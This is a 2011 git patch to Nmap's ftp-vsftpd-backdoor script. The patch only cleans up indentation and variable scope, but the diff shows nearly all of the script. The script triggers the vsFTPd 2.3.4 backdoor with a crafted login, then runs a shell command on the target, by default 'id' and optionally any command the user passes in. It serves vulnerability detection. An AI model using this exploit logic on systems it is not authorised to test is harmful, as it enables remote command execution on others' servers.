From e7d45910d905e4df0ebaaa81b478de69be42504f Mon Sep 17 00:00:00 2001 From: djalal Date: Tue, 5 Jul 2011 16:01:03 +0000 Subject: [PATCH] o [NSE] Clean indentation and make some variables local. --- scripts/ftp-vsftpd-backdoor.nse | 127 ++++++++++++++++---------------- 1 file changed, 62 insertions(+), 65 deletions(-) diff --git a/scripts/ftp-vsftpd-backdoor.nse b/scripts/ftp-vsftpd-backdoor.nse index 47afb13a2..c65cf95f0 100644 --- a/scripts/ftp-vsftpd-backdoor.nse +++ b/scripts/ftp-vsftpd-backdoor.nse @@ -1,6 +1,3 @@ --- -*- mode: lua -*- --- vim: set filetype=lua : - description = [[ Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04. This script attempts to exploit the backdoor using the innocuous id @@ -41,17 +38,17 @@ local CMD_FTP = "USER X:)\r\nPASS X\r\n" local CMD_SHELL_ID = "id" portrule = function (host, port) - -- Check if version detection knows what FTP server this is. - if port.version.product ~= nil and port.version.product ~= "vsftpd" then - return false - end + -- Check if version detection knows what FTP server this is. + if port.version.product ~= nil and port.version.product ~= "vsftpd" then + return false + end - -- Check if version detection knows what version of FTP server this is. - if port.version.version ~= nil and port.version.version ~= "2.3.4" then - return false - end + -- Check if version detection knows what version of FTP server this is. + if port.version.version ~= nil and port.version.version ~= "2.3.4" then + return false + end - return shortport.port_or_service(21, "ftp")(host, port) + return shortport.port_or_service(21, "ftp")(host, port) end local function finish_ftp(socket, status, message) @@ -92,13 +89,13 @@ local function check_backdoor(host, shell_cmd) if shell_cmd ~= CMD_SHELL_ID then status, ret = socket:send(shell_cmd.."\n") if not status then - return finish_ftp(socket, false, "failed to send shell command") + return finish_ftp(socket, false, "failed to send shell command") end status, ret = socket:receive_lines(1) if not status then - return finish_ftp(socket, false, - string.format("failed to read shell commands results: %s", - ret)) + return finish_ftp(socket, false, + string.format("failed to read shell commands results: %s", + ret)) end end end @@ -107,59 +104,59 @@ local function check_backdoor(host, shell_cmd) end action = function(host, port) - -- Get script arguments. - local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or - stdnse.get_script_args("exploit.cmd") or CMD_SHELL_ID + -- Get script arguments. + local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or + stdnse.get_script_args("exploit.cmd") or CMD_SHELL_ID - local results = { - "This installation has been backdoored: VULNERABLE", - "Command: " .. cmd, - } + local results = { + "This installation has been backdoored: VULNERABLE", + "Command: " .. cmd, + } - -- check to see if the vsFTPd backdoor was already triggered - local status, ret = check_backdoor(host, cmd) - if status then - table.insert(results, string.format("Results: %s", ret)) - return stdnse.format_output(true, results) - end + -- check to see if the vsFTPd backdoor was already triggered + local status, ret = check_backdoor(host, cmd) + if status then + table.insert(results, string.format("Results: %s", ret)) + return stdnse.format_output(true, results) + end - -- Create socket. - local sock, err = ftp.connect(host, port, - {recv_before = false, - timeout = 8000}) - if not sock then - stdnse.print_debug(1, "%s: can't connect: %s", - SCRIPT_NAME, err) - return nil - end - - -- Read banner. - buffer = stdnse.make_buffer(sock, "\r?\n") - local code, message = ftp.read_reply(buffer) - if not code then - stdnse.print_debug(1, "%s: can't read banner: %s", - SCRIPT_NAME, message) - sock:close() - return nil - end + -- Create socket. + local sock, err = ftp.connect(host, port, + {recv_before = false, + timeout = 8000}) + if not sock then + stdnse.print_debug(1, "%s: can't connect: %s", + SCRIPT_NAME, err) + return nil + end - status, ret = sock:send(CMD_FTP .. "\r\n") - if not status then - stdnse.print_debug(1, "%s: failed to send privilege escalation command: %s", - SCRIPT_NAME, ret) - return nil - end + -- Read banner. + local buffer = stdnse.make_buffer(sock, "\r?\n") + local code, message = ftp.read_reply(buffer) + if not code then + stdnse.print_debug(1, "%s: can't read banner: %s", + SCRIPT_NAME, message) + sock:close() + return nil + end - stdnse.sleep(1) - -- check if vsFTPd was backdoored - local status, ret = check_backdoor(host, cmd) - if not status then - stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, ret) - return nil - end + status, ret = sock:send(CMD_FTP .. "\r\n") + if not status then + stdnse.print_debug(1, "%s: failed to send privilege escalation command: %s", + SCRIPT_NAME, ret) + return nil + end - -- delay ftp socket cleaning - sock:close() - table.insert(results, string.format("Results: %s", ret)) - return stdnse.format_output(true, results) + stdnse.sleep(1) + -- check if vsFTPd was backdoored + status, ret = check_backdoor(host, cmd) + if not status then + stdnse.print_debug(1, "%s: %s", SCRIPT_NAME, ret) + return nil + end + + -- delay ftp socket cleaning + sock:close() + table.insert(results, string.format("Results: %s", ret)) + return stdnse.format_output(true, results) end